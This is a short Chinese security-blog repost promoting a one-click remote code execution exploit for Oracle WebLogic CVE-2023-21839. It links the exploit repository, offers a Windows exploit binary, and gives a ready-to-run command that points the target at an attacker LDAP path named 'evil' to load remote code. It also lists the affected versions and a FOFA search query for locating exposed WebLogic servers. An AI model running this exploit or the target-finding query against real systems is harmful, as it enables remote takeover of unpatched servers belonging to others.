在推送群里的应该早就看到了!
没啥发的了
简单粗暴
https://github.com/4ra1n/CVE-2023-21839
无需 Java 依赖,构造协议通过socket直接RCE
windows EXP:CVE-2023-21839.exe
后台回复CVE-2023-21839获取
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
vulhub地址
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
漏洞影响范围
Weblogic 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
FOFA Query
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
原文始发于微信公众号(浪飒sec):【漏洞利用】Weblogic远程代码执行漏洞(CVE-2023-21839)一键RCE
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论